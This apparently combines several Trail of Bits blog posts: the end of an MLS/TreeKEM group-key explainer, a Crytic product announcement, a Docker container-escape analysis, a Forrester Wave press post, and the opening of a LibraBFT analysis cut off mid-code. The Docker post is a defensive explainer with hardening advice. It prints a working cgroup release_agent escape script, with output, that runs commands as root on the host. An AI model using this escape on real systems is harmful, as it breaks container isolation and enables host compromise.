Since everyone needs public keys and public keys are not secret, Yolanda can just broadcast them as unencrypted auxiliary messages. But private keys are more sensitive. She needs to encrypt them for just the members who need them. This is where we use the ratchet tree property. If she wants Wilna and Xavier to be able to read an auxiliary message containing privY”’, she need only encrypt the message under pubWX, since Wilna and Xavier are descendants of the WX intermediate node, and will therefore be able to decrypt anything encrypted under pubWX.7 This describes how the auxiliary messages are sent to the rest of the group:

The solid black arrows above indicate public-key encrypted messages. The dashed arrows indicate plaintext messages. The arrows do not indicate who is doing the sending (since that’s all Yolanda). They’re just meant to illustrate where in the tree the values are coming from and whom they’re intended for.

Now Wilna and Xavier will update their view of the tree by saving the public keys and decrypting the root private key. Thus, everyone is on the same page and the ratchet tree property is preserved. Finally, everyone re-derives their sender keys, and the removal is complete:

Note that Zayne’s position remains blank after the removal. This saves the members from the computational overhead of shuffling themselves around and recomputing their ancestors’ keypairs. MLS defines two ways to prevent removed members from overcrowding the tree: it allows blank nodes to be removed from the right end of the tree after removals (not applicable in the example above), and it allows new members to be added in the position of previously removed members. So if the “party-planners” above wanted to replace Zayne, they could do so without making the tree bigger.

This example illustrates the smaller details in updating keys, but it doesn’t do a particularly good job at illustrating which node secrets are sent to which other nodes in the resolutions of the copath nodes. To give an idea, here’s…

A Much Bigger Example

Suppose Zayne wants to break out and go solo, but still feels the desire to be in a boy band. After cloning himself 15 times, Zayne #1 notices that one of the clones, Zayne #11, keeps hinting at breaking off and doing a solo career of his own. Zayne #1 acquiesces and removes him from the group. He sees what he’s created. Zayne #1 looks up at the stars. War soon.

Let’s see what auxiliary messages were sent when Zayne #11 was booted. In this removal process, Zayne #1 generates new secrets, ratchets them all the way up the tree, and shares them with the appropriate subtrees:

The green circles still represent the updated nodes. The solid arrows represent the private key of its tail being encrypted under the public key of its head.

The green circles still represent the updated nodes. The solid arrows represent the private key of its tail being encrypted under the public key of its head.

Notice on the right hand side of the tree, since you can’t encrypt to a blank node, the root private key needs to be encrypted under three separate public keys. The dashed arrows were omitted for clarity, but it’s still true that the public keys of all the circled nodes are broadcasted in this step.
With this larger example, you might start to see some pattern in how many auxiliary messages are sent per tree update. Let’s play

Can You Eyeball the Asymptotic Behavior?

We got efficient application messages with sender keys, and we’d like to say that we got efficient auxiliary messages with TreeKEM so we can call it a day. Is this true? Absolutely not, at least not entirely. Let’s first talk about the example above, where we start off with a tree whose nodes are all filled.

Removal in a Filled Tree

The Zayne example is actually worst-case removal behavior in a filled tree in terms of number of auxiliary messages (you should prove this to yourself: what would happen if Zayne #1 removed Zayne #6 instead?). If there are N many members in the group, there are at most log(N)-1 encrypted auxiliary messages that don’t have to deal with blank nodes, and another log(N)-1 that do. Plus, there are log(N) many public keys to share. So, to complete the sage wisdom from computer scientists of days past, if you use trees, you get O(log(N)) behavior. This is way better than the quadratic number of auxiliary messages we saw in solution #2. The same WhatsApp group of kibbitzing mumehs now only takes about 3log2(10,000) ≈ 40 total auxiliary messages to establish a new set of sender keys (assuming a filled tree) instead of the N(N-1) ≈ 99 million total auxiliary messages required previously.

Removal in a Tree with Blanks

This logarithmic behavior is fantastic, but we only checked for the very specific case where we start with a full group and then remove one person. How efficient is it when we remove a single person from a group that already has some blanks? The good news is that it’s still better than Θ(N2). The bad news is that the worst case is… well let me just show you.

Suppose every odd-numbered Zayne was removed from the group besides Zayne #1. Finally, Zayne #2 deals the finishing blow, removing Zayne #1 and restoring peace. Here is what the update looks like:

That’s N-1 messages to remove a single person! As mentioned before, this can be a prohibitively large number of auxiliary messages for large N. Even worse, it may be possible for malicious group members to strategically remove people until the tree reaches the worst-case state, thus slowing down group operations for everyone in the group.

Dealing with this situation is an open issue, and people are actively working on resolving or at least mitigating it. As of this writing, though, there are no proposed solutions that would materially improve the worst-case behavior.

Conclusion and More Info

It’s underwhelming to end at an open issue, but this is where the protocol stands today. Efficiently updating keys is at the crux of end-to-end group messaging. The TreeKEM method, edge cases and all, is one of the most important singular contributions that MLS makes. Given that there’s still at least one open issue in the spec, you may wonder

How close is the protocol to being done?

No clue. MLS has plenty of open issues (nine as of this writing) and is being tweaked constantly. Draft 7 landed just this month, and it completely overhauled the symmetric key schedule. Inefficiencies are being shaved down as issues around authenticity, confidentiality, deniability, etc. are being patched.

What are the other implementations?

The unofficial reference implementation, mlspp, is used to create test vectors that we implementers all test against. There’s also MLS*, a project at Inria to implement and formally model the protocol in F*. And there’s even another Rust implementation, melissa, being written at Wire.

Remind me why you’re writing yet another Rust implementation?

The more implementations the better. Writing this implementation has helped find errors in mlspp and the specification itself.

Errors found in mlspp include missing important fields (missing protocol version and missing hash of WelcomeInfo, which enforces sequencing), incorrect tree addressing (using leaf indices instead of node indices and vice-versa), and incorrectly generated test vectors. Errors in the specification that we found include ambiguities (how are removed nodes pruned from the ratchet tree?), logical impossibilities (how can you add a user to the group if your WelcomeInfo doesn’t include the current decryption keys?), and deontological omissions (SHOULD8 a user verify the broadcasted pubkeys against their derived pubkeys or not?).

Ok great, but why Rust?

*cracks knuckles*

I thought it would be nice to have an MLS implementation that has a clear API (thanks to molasses’ careful design and Rust’s strong typing), memory-safe semantics (thanks to the Rust borrow checker), thorough documentation (thanks to cargo doc and molasses’ current 43% comment-code ratio), and good performance (thanks to ZERO-COST-ABSTRACTIONS). Of course, none of these features make up for the fact that molasses is not formally verified like MLS* and may never be, but hey, nobody ever complained that cotton isn’t as bulletproof as kevlar, cuz those are for different things.

How can I help?

I don’t recommend filing issues with molasses quite yet. The spec is moving too quickly and the library has to be redesigned accordingly each time. If you would like to contribute, the MLS IETF page has a mailing list where you can read and participate in discussions. The organizers are helpful and patient, and I appreciate them immensely. If you want to write your own implementation, see the implementers’ Github repo for organizing info and test vectors.

If you are interested in reading more about the protocol and seeing some of the other open issues, you should give the spec9 a read.

“I want your expertise”

Well that’s going to cost you. We offer consulting in end-to-end protocol design, engineering, and auditing. Drop us a line on our contact page if you’re interested.

Thanks for reading! If you have questions or corrections, please feel free to email me at michael.rosenberg@trailofbits.com.

Footnotes:

  1. Full post-compromise security, i.e., the problem of non-deterministically deriving all new shared data so as to make the excluded parties unable to participate, is actually not easily achieved in this scheme. There is ongoing research in characterizing how post-compromise secure MLS is after a certain number of group updates.
  2. Source. This is a fantastic paper which provides a lot of context for this article. Seriously, if you want to understand this topic better, you should read the MLS spec and this paper and compare the two, since they differ in pretty subtle but significant ways. E.g., the ART scheme used in the paper does not allow intermediate nodes to be blank, which affects confidentiality of messages sent to offline members.
  3. The problem of Removal in this article is a placeholder for (a weaker form of) post-compromise security. Here, “group modifications” includes updating key material without changing group membership.
  4. Specifically, it is a left-balanced binary tree. This is fancy computer talk for “every left subtree is full,” which itself is fancy computer talk for “it behaves good when stuffed into an array.”
  5. Both these statements are technically false, but it’s way easier to think of things this way, and it’s close enough to the truth imo. In reality, sender keys are derived from a long chain of secret values relating to group state and state transitions. Node private keys are simpler, but they are also derived from chains of other secrets called “node secrets” and “path secrets.” As always, see the spec for more details.
  6. MLS doesn’t allow users to remove themselves. This is a quirk of the protocol, but it doesn’t really affect anything.
  7. If you’re confused why I say all these keys are DH keys and then use public-key encryption, it’s because the public-key encryption in MLS is done with ECIES. More specifically, it’s HPKE.
  8. The all-caps “SHOULD” means something specific in IETF RFCs. Its meaning is governed by not one but two RFCs, which are referred to as Best Current Practice 14. The linguistic conventions of RFCs are super cool and alone make it worth skimming a few specs and paying attention to their “conventions and terminology” sections. TLS is as good a place to start as any.
  9. If you want a particularly nice reading experience, you should compile the spec yourself from source. It really is appreciably better.

SVGs of the images in this post are available.

Crytic: Continuous Assurance for Smart Contracts

Note: This blog has been reposted from Truffle Suite’s blog.

We are proud to announce our new smart contract security product: https://crytic.io/. Crytic provides continuous assurance for smart contracts. The platform reports build status on every commit and runs a suite of security analyses for immediate feedback.

The beta will be open soon. Follow us on twitter to be notified and benefit from the service as soon as possible! The first three months are free.

How Crytic will secure your smart contracts

Once connected to your GitHub repository, Crytic will continuously:

  • Run our static analyzer Slither, which detects the most common smart contracts vulnerabilities and will save you from critical mistakes.
  • Run your Truffle tests to ensure that no functional bugs are added while developing your project.

Slither will analyze your codebase for more than 60 security flaws, including reentrancy, integer overflows, race conditions, and many others. Half of these flaw-detectors are private and were not available to the public. They can detect flaws for which public knowledge is limited and that no other tool can find. The recent GridLock bug would have been detected ahead of time using Crytic!

We built this platform for developers, so we integrated it with GitHub. It will watch every commit and branch to ensure that bugs are not added during development. In addition, Crytic will run the checks on every PR to facilitate your code review.

For every security issue found, Crytic will:

  • Show you a detailed report on the bug, including source-code highlighting.
  • Allow you to create a GitHub issue to keep track of the fixes easily.
  • Let you triage the results, so you can decide what needs to be fixed.

Quick Walkthrough

Adding Crytic to your system is straightforward: you just need to connect to your GitHub repository. We have first-class support for Truffle; it works out of the box! We also support most of the other smart contract platforms, including Embark, Dapp, and Etherlime. After adding your repository, the dashboard (Figure 1) will show you a summary of the project, like this crytic-demo:

Figure 1: The Crytic Dashboard

From now on, you will benefit from continuous security analyses.

Issue reports

Finding an issue is only the first part. Crytic will provide you with detailed information you need about the bug to fix it:

Figure 2: Reports provide detailed information needed to understand and fix issues

A careful reader will notice the vulnerability here: function constuctor creates a public function (with a typo!) that is callable by anyone instead of being run only at initialization. Crytic will detect these types of critical mistakes instantaneously.

Triaging issues

Once a bug has been found, the user can decide to:

  • create a GitHub issue, to easily keep track of the fix, or
  • discard the issue.

Figure 3: Crytic easily creates GitHub issues for selected reports

Crytic follows the modifications to your code and reports only new bugs that are introduced. Each new PR will be analyzed automatically:

Figure 4: Crytic is fully integrated with GitHub Pull Requests

What’s next for Crytic

We are constantly improving Crytic. Expect to see new bug detectors and new features in the future. We are planning to add:

  • Echidna and Manticore integration: to ensure your code is checked for custom security properties.
  • Automatic bug repair: Crytic will propose patches to fix the issues it finds.
  • Slither printer integration: to help visualize the underlying details of your code.
  • Delegatecall proxy checker: to prevent you from making critical—and all too common—mistakes in your upgradeability process.

Questions? Bring them to TruffleCon, and pose them to us at our booth or at our Friday workshop on automated vulnerability detection tools!

Whether or not you can make it to TruffleCon, join our slack channel (#crytic) for support, and watch @CryticCI to find out as soon as our beta is open.

Understanding Docker container escapes

Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes.

Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature.

Here’s a version of the PoC that launches ps on the host:

# spawn a new container to exploit via:
# docker run --rm -it --privileged ubuntu bash

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nps >'"$t/o" >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

The --privileged flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities.

Don’t run containers with --privileged. Docker includes granular settings that independently control the privileges of containers. In our experience, these critical security settings are often forgotten. It is necessary to understand how these options work to secure your containers.

In the sections that follow, we’ll walk through exactly how this “container escape” works, the insecure settings that it relies upon, and what developers should do instead.

Requirements to use this technique

In fact, --privileged provides far more permissions than needed to escape a docker container via this method. In reality, the “only” requirements are:

  1. We must be running as root inside the container
  2. The container must be run with the SYS_ADMIN Linux capability
  3. The container must lack an AppArmor profile, or otherwise allow the mount syscall
  4. The cgroup v1 virtual filesystem must be mounted read-write inside the container

The SYS_ADMIN capability allows a container to perform the mount syscall (see man 7 capabilities). Docker starts containers with a restricted set of capabilities by default and does not enable the SYS_ADMIN capability due to the security risks of doing so.

Further, Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN.

A container would be vulnerable to this technique if run with the flags: --security-opt apparmor=unconfined --cap-add=SYS_ADMIN

Using cgroups to deliver the exploit

Linux cgroups are one of the mechanisms by which Docker isolates containers. The PoC abuses the functionality of the notify_on_release feature in cgroups v1 to run the exploit as a fully privileged root user.

When the last task in a cgroup leaves (by exiting or attaching to another cgroup), a command supplied in the release_agent file is executed. The intended use for this is to help prune abandoned cgroups. This command, when invoked, is run as a fully privileged root on the host.

1.4 What does notify_on_release do ?
————————————
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the “release_agent” file in that hierarchy’s root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled (0). The default value of other cgroups at creation is the current value of their parents’ notify_on_release settings. The default value of a cgroup hierarchy’s release_agent path is empty.

Linux Kernel documentation on cgroups v1

Refining the proof of concept

There is a simpler way to write this exploit so it works without the --privileged flag. In this scenario, we won’t have access to a read-write cgroup mount provided by --privileged. Adapting to this scenario is easy: we’ll just mount the cgroup as read-write ourselves. This adds one extra line to the exploit but requires fewer privileges.

The exploit below will execute a ps aux command on the host and save its output to the /output file in the container. It uses the same release_agent feature as the original PoC to execute on the host.

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Breaking down the proof of concept

Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.

To trigger this exploit we need a cgroup where we can create a release_agent file and trigger release_agent invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.

To do that, we create a /tmp/cgrp directory, mount the RDMA cgroup controller and create a child cgroup (named “x” for the purposes of this example). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers.

If you’re following along and get “mount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change rdma to memory to fix it. We’re using RDMA because the original PoC was only designed to work with it.

Note that cgroup controllers are global resources that can be mounted multiple times with different permissions and the changes rendered in one mount will apply to another.

We can see the “x” child cgroup creation and its directory listing below.

root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
root@b11cf9eab4fd:/# ls /tmp/cgrp/
cgroup.clone_children  cgroup.procs  cgroup.sane_behavior  notify_on_release  release_agent  tasks  x
root@b11cf9eab4fd:/# ls /tmp/cgrp/x
cgroup.clone_children  cgroup.procs  notify_on_release  rdma.current  rdma.max  tasks

Next, we enable cgroup notifications on release of the “x” cgroup by writing a 1 to its notify_on_release file. We also set the RDMA cgroup release agent to execute a /cmd script — which we will later create in the container — by writing the /cmd script path on the host to the release_agent file. To do it, we’ll grab the container’s path on the host from the /etc/mtab file.

The files we add or modify in the container are present on the host, and it is possible to modify them from both worlds: the path in the container and their path on the host.

Those operations can be seen below:

root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent

Note the path to the /cmd script, which we are going to create on the host:

root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent
/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd

Now, we create the /cmd script such that it will execute the ps aux command and save its output into /output on the container by specifying the full path of the output file on the host. At the end, we also print the /cmd script to see its contents:

root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
root@b11cf9eab4fd:/# chmod a+x /cmd
root@b11cf9eab4fd:/# cat /cmd
#!/bin/sh
ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output

Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a /bin/sh process and writing its PID to the cgroup.procs file in “x” child cgroup directory, the script on the host will execute after /bin/sh exits. The output of ps aux performed on the host is then saved to the /output file inside the container:

root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
root@b11cf9eab4fd:/# head /output
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.1  1.0  17564 10288 ?        Ss   13:57   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S    13:57   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_gp]
root         4  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_par_gp]
root         6  0.0  0.0      0     0 ?        I<   13:57   0:00 [kworker/0:0H-kblockd]
root         8  0.0  0.0      0     0 ?        I<   13:57   0:00 [mm_percpu_wq]
root         9  0.0  0.0      0     0 ?        S    13:57   0:00 [ksoftirqd/0]
root        10  0.0  0.0      0     0 ?        I    13:57   0:00 [rcu_sched]
root        11  0.0  0.0      0     0 ?        S    13:57   0:00 [migration/0]

Use containers securely

Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the --privileged flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary.

To help keep containers secure:

  • Do not use the --privileged flag or mount a Docker socket inside the container. The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the --privileged flag.
  • Do not run as root inside the container. Use a different user or user namespaces. The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
  • Drop all capabilities (--cap-drop=all) and enable only those that are required (--cap-add=...). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack.
  • Use the “no-new-privileges” security option to prevent processes from gaining more privileges, for example through suid binaries.
  • Limit resources available to the container. Resource limits can protect the machine from denial of service attacks.
  • Adjust seccomp, AppArmor (or SELinux) profiles to restrict the actions and syscalls available for the container to the minimum required.
  • Use official docker images or build your own based on them. Don’t inherit or use backdoored images.
  • Regularly rebuild your images to apply security patches. This goes without saying.

If you would like a second look at your organization’s critical infrastructure, Trail of Bits would love to help. Reach out and say hello!

Trail of Bits Named in Forrester Wave as a Leader in Midsize Cybersecurity Consulting Services

Trail of Bits was among the select companies that Forrester invited to participate in its recent report, The Forrester Wave™: Midsize Cybersecurity Consulting Services, Q2 2019. In this evaluation, Trail of Bits was cited as a Leader. We received the highest score among all participants in the current offering category, among the highest scores in the strategy category, and the highest scores possible in sixteen of the evaluation’s criteria.

You can download the full report here!

What is the Forrester Wave™?

Forrester is a leading global research and advisory firm that offers a variety of market reports, research, analysis, and consulting services. The Forrester Wave is a specific Forrester evaluation that provides “a guide for buyers considering their purchasing options in a technology marketplace.”

When Forrester reached out to us to participate in their study, we jumped at the chance. We respect their publication a lot. In our view, the Wave is:

  • A trusted source of truth for top companies – Forrester reports are the gold standard for citations on market data.
  • It’s not a paid publication – If they find a weakness in a participant’s company, they won’t gloss over it.
  • The criteria are thoughtful – It’s hard to fully comprehend what’s important in cybersecurity consulting, especially for someone relatively new to our niche industry. Assessing efficacy is tough even if you know what you’re looking for. Forrester overcomes this by getting feedback on its questions and ranking criteria from participants.

What happened?

Forrester reached out to us and our competitors for an introductory call on how to prepare as participants. We were given the option to opt-out of participating but told we would be included in the report, regardless. Participants then provided feedback on criteria that Forrester Wave would use to assess our competencies. Once the criteria were finalized, Forrester gathered data from us and from some of our clients on how we performed against those criteria. When their report was complete, they let all participants fact-check the report. Needless to say, we were pleased to see that we’d received the highest score in the Current Offering category, and among the highest scores in the Strategy category.

The results

In addition to our ranking, Forrester made this analysis of our strengths and weaknesses:

Trail of Bits’ innovation efforts set its technical services apart. Its unique services include binary analysis, blockchain security, cryptography, and software development — many of which rely on tools that Trail of Bits developed in-house. Trail of Bits is also actively involved in building the cybersecurity community, especially emerging talent. It hosts a variety of office hours and local meetups and develops free educational resources for all levels of cybersecurity professionals. Reference customers highlighted Trail of Bits’ thought leadership, deep expertise in fields like blockchain security and cryptography, and thoroughness as strengths. However, those high standards come with some drawbacks as customers also noted limited resources and price as concerns. Trail of Bits’ deliverables are quite technical, and clients needed to do some extra translation of those deliverables for nonsecurity[sic] executives. For clients seeking a high level of technical cybersecurity proficiency from its services firm, Trail of Bits is a top-tier choice.

Our reflections

We’re celebrating the good

Trail of Bits’ innovation efforts set its technical services apart.

Our Take: Indeed! Our investments in R&D, our focus on using cutting-edge open source tooling, and our preference for tackling tough problems helps us hone our advanced techniques and innovative approach.

Trail of Bits is also actively involved in building the cybersecurity community, especially emerging talent.

Our Take: We’re happy for this work to shine through! We’re passionate about empowering emerging talent with the information and skills necessary to break into our industry and push science forward with us. Sharing our proprietary tools open-source, sharing knowledge through online resources and our Empire Hacking meetup, and sponsoring emerging research are all core to our mission.

Reference customers highlighted Trail of Bits’ thought leadership, deep expertise in fields like blockchain security and cryptography, and thoroughness as strengths.

Our Take: We are intentional about focusing deeply on our niche skillset because it prepares us for solving our clients’ most challenging problems. We produce and use publicly available tools in our assessments, resulting in repeatable, verifiable results that other firms can’t offer.

We’re finding more ways to improve

Even as a Leader, this report shows us some opportunities for improvement. Our efforts to grow at a pace that meets increasing market demands for our services is a challenge. We prefer to hire well rather than hire quickly. We know that the price point of our niche services puts our paid expertise out of reach for some smaller and under-resourced companies. We will address that by continuing to offer our knowledge on our blog, our open-source tools on github, and our community resources like Empire Hacking and the NYC-Infosec directory. Finally, we are committed to translating summaries of our highly technical work for clients’ non-security executives. You can check out how we’re doing that in our public reports and presentations.

Overall, we’re honored to be included in this year’s report, encouraged by its findings, and excited to share the results.

Could you use a Forrester Wave Leader’s advice on a cybersecurity problem you’re facing? Contact us

On LibraBFT’s use of broadcasts

LibraBFT is the Byzantine Fault Tolerant (BFT) consensus algorithm used by the recently released Libra cryptocurrency. LibraBFT is based on another BFT consensus algorithm called HotStuff. While some have noted the similarities between the two algorithms, they differ in some crucial respects. In this post we highlight one such difference: in LibraBFT, non-leaders perform broadcasts. This has implications on liveness analysis, communication complexity, and leader election. We delve into each of these topics following a brief review of what BFT consensus algorithms are and why they are useful.

A brief history of BFT consensus algorithms

The term Byzantine Fault Tolerant (BFT) originates from a paper by Lamport, Shostak, and Pease. In that paper, the authors consider a fictional scenario in which a group of Byzantine generals are considering whether to attack a city. The problem is that some of the generals are traitors. The question is, if the traitors spread misinformation, then under what conditions can the group agree to attack or retreat from the city? Note that neither attacking nor retreating is considered more favorable than the other: the problem is simply to agree on one action!

This scenario is a metaphor for one that commonly arises in distributed systems: the generals are nodes in a network, the traitors are faulty nodes, and attacking the city is, say, committing a transaction to a database.

The Lamport et al. paper proposes a solution to this problem. However, the solution implicitly assumes a synchronous network, which means that messages between nodes are delivered within a fixed, known time bound. Compare this to an asynchronous network, where messages can be arbitrarily delayed and even reordered.

Dwork, Lynch, and Stockmeyer were the first to propose deterministic algorithms that solve the Byzantine generals problem for “partially synchronous” networks. (Earlier, Rabin and Ben-Or had proposed randomized algorithms.) Dwork et al.’s analysis of what it means for a network to be “partially synchronous” was a significant contribution to the study of BFT algorithms. However, the purpose of Dwork et al.’s algorithms appears to have been to establish the existence of such solutions. Thus, their algorithms are of more theoretical than practical interest.

Toward the end of the century, Castro and Liskov proposed a solution on which many contemporary algorithms have been based (e.g., Tendermint, described below). Castro and Liskov’s algorithm, called Practical Byzantine Fault Tolerance (PBFT) works as follows. Each round has a designated leader chosen from among the nodes, and each round is composed of three phases. Roughly, in the first phase, the leader proposes a command for all nodes to execute; in the second phase, the nodes vote on the command; and in the third phase, the nodes acknowledge receipt of each others’ votes and execute the command. When a node believes that a round has gone on for too long, it sends a timeout message to all other nodes. Nodes must agree that a round should timeout. The process is somewhat complicated. PBFT, as a whole, works up to when ⌊(n-1)/3⌋ of the n nodes are faulty, which is the best that one can do.

In order to circumvent a classic impossibility result of Fischer, Lynch, and Paterson, PBFT prioritizes safety over liveness. This means that, say, a leader could propose a command and that command could fail to be executed, e.g., because of network problems. However, the algorithm is safe in the sense that if two non-faulty nodes execute some sequence of commands, then one is necessarily a prefix of the other.

It is interesting to note how PBFT uses broadcasts. During the first phase of each round, the leader broadcasts to all nodes. But, during the second and third phases, all nodes (not just the leader) broadcast to one another.

Figure 1 from the PBFT paper, which calls the three phases of each round “pre-prepare,” “prepare,” and “commit.” The numbers represent network nodes and the arrows represent messages. Note how non-leader nodes 1 and 2 broadcast to all other nodes during the second and third phases.

Many variants of PBFT have been proposed. One notable example is Tendermint. Like PBFT, Tendermint proceeds in rounds, each round is divided into three phases, and the use of broadcasts in each phase is similar. However, whereas timeouts in PBFT occur with respect to entire rounds, timeouts in Tendermint occur with respect to individual phases, which many regard as a simpler strategy. (See here for additional discussion.) Also, Tendermint has a well-tested implementation that is actively developed. For this reason, if none other, Tendermint has seen widespread use.

HotStuff may also be regarded as a variant of PBFT. The HotStuff algorithm is “pipelined” so that timing out in a round is essentially no different than timing out in a phase. But perhaps HotStuff’s most notable improvement over PBFT is its reduced “authenticator complexity.” As defined in the HotStuff paper, “an authenticator is either a partial signature or a signature” (page 4). The paper argues that “Authenticator complexity is a useful measure of communication complexity… it hides unnecessary details about the transmission topology… n messages carrying one authenticator count the same as one message carrying n authenticators.”

HotStuff achieves reduced authenticator complexity, in part, by using threshold signatures. This allows non-leaders to send their messages to only the leader and not to one another. For example, when voting on a command, nodes in HotStuff send their “share” of a signature to the leader. Once the leader has accumulated 2⌊(n-1)/3⌋ + 1 such shares, it broadcasts the combined signature to all other nodes. The other phases of the HotStuff algorithm are similar. In this way, HotStuff achieves linear authenticator complexity.

LibraBFT

LibraBFT is the consensus algorithm used by the Libra cryptocurrency. LibraBFT is based on HotStuff. According to the Libra authors, there were “three reasons for selecting the HotStuff protocol as the basis for LibraBFT: (1) simplicity and modularity of the safety argument; (2) ability to easily integrate consensus with execution; and (3) promising performance in early experiments.”

LibraBFT and HotStuff are very similar. For example, LibraBFT retains HotStuff’s pipelined design. Furthermore, when voting on a command (or “block” to use LibraBFT’s terminology), nodes send their votes to only the leader and not to all other nodes.

Figure 3 from the LibraBFT paper. The letters B, V, and C are mnemonic for “block,” “vote,” and “[quorum] certificate,” respectively. Note how nodes send their votes to only the leader (like in HotStuff) and do not broadcast them to all other nodes (like in PBFT). On the other hand, note the caption, which indicates that “round synchronization” is not reflected in the figure. Round synchronization does involve broadcasts.

However, to achieve certain goals (explained below), LibraBFT uses broadcasts in ways that HotStuff does not. (In this way, LibraBFT resembles its distant ancestor, PBFT.) Specifically, LibraBFT requires non-leader nodes to perform broadcasts under the following circumstances:

  1. Nodes regularly synchronize their states using broadcasts.
  2. When a timeout is reached, e.g., because of network problems or a faulty leader, nodes send a timeout message to all other nodes.

The use of broadcasts for state synchronization makes it easier to establish a liveness result for LibraBFT. The reason for broadcasting timeouts is not given in the LibraBFT paper. However, as we explain below, we suspect it is to allow for the future use of an adaptive leader election mechanism. Despite these advantages, the additional broadcasts have the unfortunate side-effect of increasing the algorithm’s communication complexity. However, such an increase in communication complexity may be unavoidable. (Neither the state synchronization broadcasts nor the timeout broadcasts should affect the algorithm’s safety.)

Note: A recent blog post entitled “Libra: The Path Forward” makes clear that LibraBFT is a work-in-progress. Perhaps for this reason, there are discrepancies between LibraBFT as defined in the LibraBFT paper and as implemented in the Libra source code. For the remainder of this blog post, we focus on the former. We point out a couple of the differences between the LibraBFT specification and the Libra source code below. (Also note that, while the LibraBFT paper does contain code, that code is not part of Libra itself, but of a simulator. The LibraBFT authors “intend to share the code for this simulator and provide experimental results in a subsequent version of the report” (page 4). That version of the report has not yet been released.)

Liveness analysis

In LibraBFT, “nodes broadcast their states at least once per period of time [the minimum broadcast interval] 𝐼 > 0” (page 22). No similar notion exists in HotStuff. Unsurprisingly, this makes it easier to establish a liveness result for LibraBFT. However, liveness analysis of the two algorithms differ in other ways, as we now explain.

HotStuff’s liveness theorem asserts that, under certain technical conditions including that the round leader is non-faulty, there exists a time bound within which all non-faulty nodes execute a command and move on to the next round. The liveness theorem is parameterized by two functions: Leader and NextView. Leader is a function of the round number and determines the leader of that round. The arguments of NextView are not given specifically, but include at least the round number. NextView determines when round timeout “interrupts” are generated.

HotStuff’s liveness theorem

LibraBFT’s liveness theorem has a similar form. However, there are two significant differences. First, LibraBFT’s analogs of the Leader and NextView functions are not left as parameters, but are given explicitly. Second, the time bound within which a command is executed is not merely to asserted to exist, but is also given explicitly.

LibraBFT_liveness

LibraBFT’s liveness theorem

Of note is the fact that LibraBFT’s explicit time bound features 𝐼, the minimum broadcast interval, mentioned above. The appearance of 𝐼 demonstrates that LibraBFT’s liveness analysis differs fundamentally from that of HotStuff, and is not merely a byproduct of explicitly given Leader and NextView mechanisms.

We would also point out that this is a place where LibraBFT specification and the Libra source code do not exactly match. In LibraBFT, nodes broadcast their states to one another using DataSyncNotification messages (defined in Appendix A.3 of the LibraBFT paper). Nothing analogous to a DataSyncNotification message seems to exist within the Libra source code. For example, if one looks at the start_event_processing function from Libra’s chained_bft module, one can see calls to functions that process proposals, votes, etc. However, there is no call that would seem to process something resembling a DataSyncNotification message.

fn start_event_processing(
